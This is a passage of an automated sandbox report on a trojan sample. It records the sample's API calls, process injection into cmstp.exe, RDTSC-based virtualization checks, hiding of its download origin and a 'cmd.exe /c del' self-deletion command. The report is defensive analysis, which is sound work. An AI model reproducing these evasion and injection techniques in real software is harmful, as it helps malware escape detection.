          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359950 NtQueueApcThread,7_2_01359950
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013595F0 NtQueryInformationFile,7_2_013595F0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013599D0 NtCreateProcessEx,7_2_013599D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359820 NtEnumerateKey,7_2_01359820
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0135B040 NtSuspendThread,7_2_0135B040
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013598A0 NtWriteVirtualMemory,7_2_013598A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359730 NtQueryVirtualMemory,7_2_01359730
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0135A710 NtOpenProcessToken,7_2_0135A710
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359B00 NtSetValueKey,7_2_01359B00
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359770 NtSetInformationFile,7_2_01359770
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0135A770 NtOpenThread,7_2_0135A770
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359760 NtOpenProcess,7_2_01359760
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0135A3B0 NtGetContextThread,7_2_0135A3B0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359610 NtEnumerateValueKey,7_2_01359610
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359A10 NtQuerySection,7_2_01359A10
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359670 NtQueryInformationProcess,7_2_01359670
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359650 NtQueryValueKey,7_2_01359650
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359A80 NtOpenDirectoryObject,7_2_01359A80
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013596D0 NtCreateKey,7_2_013596D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79860 NtQuerySystemInformation,LdrInitializeThunk,17_2_04E79860
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79840 NtDelayExecution,LdrInitializeThunk,17_2_04E79840
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E795D0 NtClose,LdrInitializeThunk,17_2_04E795D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E799A0 NtCreateSection,LdrInitializeThunk,17_2_04E799A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79540 NtReadFile,LdrInitializeThunk,17_2_04E79540
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79910 NtAdjustPrivilegesToken,LdrInitializeThunk,17_2_04E79910
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E796E0 NtFreeVirtualMemory,LdrInitializeThunk,17_2_04E796E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E796D0 NtCreateKey,LdrInitializeThunk,17_2_04E796D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79660 NtAllocateVirtualMemory,LdrInitializeThunk,17_2_04E79660
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79A50 NtCreateFile,LdrInitializeThunk,17_2_04E79A50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79650 NtQueryValueKey,LdrInitializeThunk,17_2_04E79650
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79FE0 NtCreateMutant,LdrInitializeThunk,17_2_04E79FE0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79780 NtMapViewOfSection,LdrInitializeThunk,17_2_04E79780
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79710 NtQueryInformationToken,LdrInitializeThunk,17_2_04E79710
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E798F0 NtReadVirtualMemory,17_2_04E798F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E798A0 NtWriteVirtualMemory,17_2_04E798A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E7B040 NtSuspendThread,17_2_04E7B040
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79820 NtEnumerateKey,17_2_04E79820
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E795F0 NtQueryInformationFile,17_2_04E795F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E799D0 NtCreateProcessEx,17_2_04E799D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79560 NtWriteFile,17_2_04E79560
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79950 NtQueueApcThread,17_2_04E79950
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79520 NtWaitForSingleObject,17_2_04E79520
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E7AD30 NtSetContextThread,17_2_04E7AD30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79A80 NtOpenDirectoryObject,17_2_04E79A80
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79670 NtQueryInformationProcess,17_2_04E79670
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79A20 NtResumeThread,17_2_04E79A20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79A00 NtProtectVirtualMemory,17_2_04E79A00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79610 NtEnumerateValueKey,17_2_04E79610
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79A10 NtQuerySection,17_2_04E79A10
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E797A0 NtUnmapViewOfSection,17_2_04E797A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E7A3B0 NtGetContextThread,17_2_04E7A3B0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79760 NtOpenProcess,17_2_04E79760
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79770 NtSetInformationFile,17_2_04E79770
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E7A770 NtOpenThread,17_2_04E7A770
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79730 NtQueryVirtualMemory,17_2_04E79730
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E79B00 NtSetValueKey,17_2_04E79B00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E7A710 NtOpenProcessToken,17_2_04E7A710
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA8680 NtReadFile,17_2_02FA8680
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA87B0 NtAllocateVirtualMemory,17_2_02FA87B0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA8700 NtClose,17_2_02FA8700
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA85D0 NtCreateFile,17_2_02FA85D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA86FA NtReadFile,NtClose,17_2_02FA86FA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA867A NtReadFile,17_2_02FA867A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA85CA NtCreateFile,17_2_02FA85CA
          Source: 583475.exe, 00000000.00000002.741383689.0000000002CF3000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPe6.dll" vs 583475.exe
          Source: 583475.exe, 00000000.00000002.740499326.000000000094C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDemoProject2.exe: vs 583475.exe
          Source: 583475.exe, 00000000.00000002.747381692.0000000006850000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameSHCore1.dll0 vs 583475.exe
          Source: 583475.exe, 00000000.00000003.729306073.0000000006746000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAddInProcess32.exeT vs 583475.exe
          Source: 583475.exeBinary or memory string: OriginalFilenameDemoProject2.exe: vs 583475.exe
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
          Source: 583475.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\583475.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\583475.exe 'C:\Users\user\Desktop\583475.exe'
          Source: C:\Users\user\Desktop\583475.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\583475.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'Jump to behavior
          Source: C:\Users\user\Desktop\583475.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\583475.exe.logJump to behavior
          Source: C:\Users\user\Desktop\583475.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/2@4/3
          Source: C:\Users\user\Desktop\583475.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: 583475.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_01
          Source: C:\Users\user\Desktop\583475.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\583475.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\583475.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\583475.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: 583475.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: 583475.exeStatic file information: File size 1085952 > 1048576
          Source: 583475.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 583475.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x108800
          Source: 583475.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: cmstp.pdbGCTL source: AddInProcess32.exe, 00000007.00000002.830902849.00000000017C0000.00000040.00020000.sdmp
          Source: Binary string: AddInProcess32.pdb source: 583475.exe, 00000000.00000003.729306073.0000000006746000.00000004.00000001.sdmp, AddInProcess32.exe, cmstp.exe, 00000011.00000002.920345538.0000000000CEC000.00000004.00000020.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, cmstp.exe, 00000011.00000002.921765476.0000000004F2F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: AddInProcess32.exe, 00000007.00000002.830902849.00000000017C0000.00000040.00020000.sdmp
          Source: Binary string: AddInProcess32.pdbpw source: 583475.exe, 00000000.00000003.729306073.0000000006746000.00000004.00000001.sdmp, AddInProcess32.exe, 00000007.00000000.731556294.0000000000892000.00000002.00020000.sdmp, cmstp.exe, 00000011.00000002.920345538.0000000000CEC000.00000004.00000020.sdmp, AddInProcess32.exe.0.dr
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_00845EAE push ebx; retf 0_2_00845EAF
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067CEE70 push E8FFFFFFh; retf 0_2_067CEE75
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0041B87C push eax; ret 7_2_0041B882
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0041B812 push eax; ret 7_2_0041B818
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0041B81B push eax; ret 7_2_0041B882
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_00407A17 push cs; iretd 7_2_00407A1F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_004152CE push edi; ret 7_2_00415355
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_004152FD push edi; ret 7_2_00415355
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_00415CCC push esp; iretd 7_2_00415CCD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_00414DAE push esi; iretd 7_2_00414DB2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_00414ED0 push ds; ret 7_2_00414ED1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0041B7C5 push eax; ret 7_2_0041B818
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0136D0D1 push ecx; ret 7_2_0136D0E4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E8D0D1 push ecx; ret 17_2_04E8D0E4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA52FD push edi; ret 17_2_02FA5355
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA52CE push edi; ret 17_2_02FA5355
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02F97A17 push cs; iretd 17_2_02F97A1F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FABBF4 push 00000009h; iretd 17_2_02FABBF6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FAB87C push eax; ret 17_2_02FAB882
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FAB81B push eax; ret 17_2_02FAB882
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FAB812 push eax; ret 17_2_02FAB818
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA4ED0 push ds; ret 17_2_02FA4ED1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FAC699 push eax; retf 17_2_02FAC69A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FAB7C5 push eax; ret 17_2_02FAB818
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA5CCC push esp; iretd 17_2_02FA5CCD
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA4DAE push esi; iretd 17_2_02FA4DB2
          Source: 583475.exe, Fq2/r8Q.csHigh entropy of concatenated method names: '.ctor', 'a8H', 'i8R', 'Tp4', 's7W', 'Gi4', 'n6D', 'Zg2', 'Rd8', 'a7R'
          Source: 583475.exe, Yt9/r5P.csHigh entropy of concatenated method names: '.ctor', 'x5F', 'f0T7', 'Nk53', 'i6R4', 's8LZ', 'Ro40', 'Lx8s', 'j2SA', 'Kn62'
          Source: 583475.exe, Je1w/Ec5i.csHigh entropy of concatenated method names: '.ctor', 'Cc0d', 'a5TL', 'Jz3c', 'p8KW', 'Jq19', 'Nn28', 'Pg1b', 'g2MY', 'w7KA'
          Source: 583475.exe, f4J/Cx3.csHigh entropy of concatenated method names: '.ctor', 'Yq7', 'Ep4', 't8H', 'Zw4', 'g3J', 'j5W', 'z1M', 'a7M', 'Et3'
          Source: 583475.exe, m1DY/f0L8.csHigh entropy of concatenated method names: '.ctor', 'Ym5r', 'Wa9g', 'm3W5', 'Py7i', 'Ak85', 'Wc18', 'An10', 'a6TP', 'Mo97'
          Source: 583475.exe, Qg54/Xy40.csHigh entropy of concatenated method names: '.ctor', 'f5RG', 'Nq3a', 'Ta51', 'c4Q1', 't5A2', 'Qx0n', 'm6J1', 'z2SN', 'd4P1'
          Source: 583475.exe, f6L/i0X.csHigh entropy of concatenated method names: '.ctor', 'n9X', 's0G', 'Gm4', 'Rf7', 'Ws0', 'Dn2', 'Wr6', 'o9W', 'Nb6'
          Source: 583475.exe, Lk6/Jg7.csHigh entropy of concatenated method names: '.ctor', 'Sq0', 'Fb1', 'Wa5', 'Nz6', 'i6E', 'Tr4', 'Kd6', 'c5J', 'Qe1'
          Source: 583475.exe, Sq2/Hn1.csHigh entropy of concatenated method names: '.ctor', 'Cz5', 'Qd4', 'Mj2', 'Cq2', 'Gw5', 'Zb8', 'Ez7', 's8M', 'Lz7'
          Source: 583475.exe, f1R0/p0M1.csHigh entropy of concatenated method names: '.ctor', 'Jx71', 'Ci1s', 'Dm7f', 's5FA', 'Bb5j', 'Jg47', 'Ly51', 'Cm95', 'Bs8f'
          Source: C:\Users\user\Desktop\583475.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
          Source: C:\Users\user\Desktop\583475.exeFile opened: C:\Users\user\Desktop\583475.exe\:Zone.Identifier read attributes | deleteJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000002F98604 second address: 0000000002F9860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000002F9898E second address: 0000000002F98994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\583475.exe TID: 6416Thread sleep time: -14757395258967632s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\583475.exe TID: 6416Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\583475.exe TID: 4684Thread sleep count: 502 > 30Jump to behavior
          Source: C:\Users\user\Desktop\583475.exe TID: 4684Thread sleep count: 9368 > 30Jump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_004088C0 rdtsc 7_2_004088C0
          Source: C:\Users\user\Desktop\583475.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\583475.exeWindow / User API: threadDelayed 502Jump to behavior
          Source: C:\Users\user\Desktop\583475.exeWindow / User API: threadDelayed 9368Jump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\583475.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\583475.exeThread delayed: delay time: 30000Jump to behavior
          Source: 583475.exeBinary or memory string: IHGFSD
          Source: explorer.exe, 00000009.00000000.783820666.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000009.00000000.780685564.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000009.00000000.783820666.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000009.00000000.761406468.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000009.00000000.751150955.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000009.00000000.766952588.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_004088C0 rdtsc 7_2_004088C0
          Source: C:\Users\user\Desktop\583475.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131AD30 mov eax, dword ptr fs:[00000030h]7_2_0131AD30
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01323D34 mov eax, dword ptr fs:[00000030h]7_2_01323D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01323D34 mov eax, dword ptr fs:[00000030h]7_2_01323D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01323D34 mov eax, dword ptr fs:[00000030h]7_2_01323D34
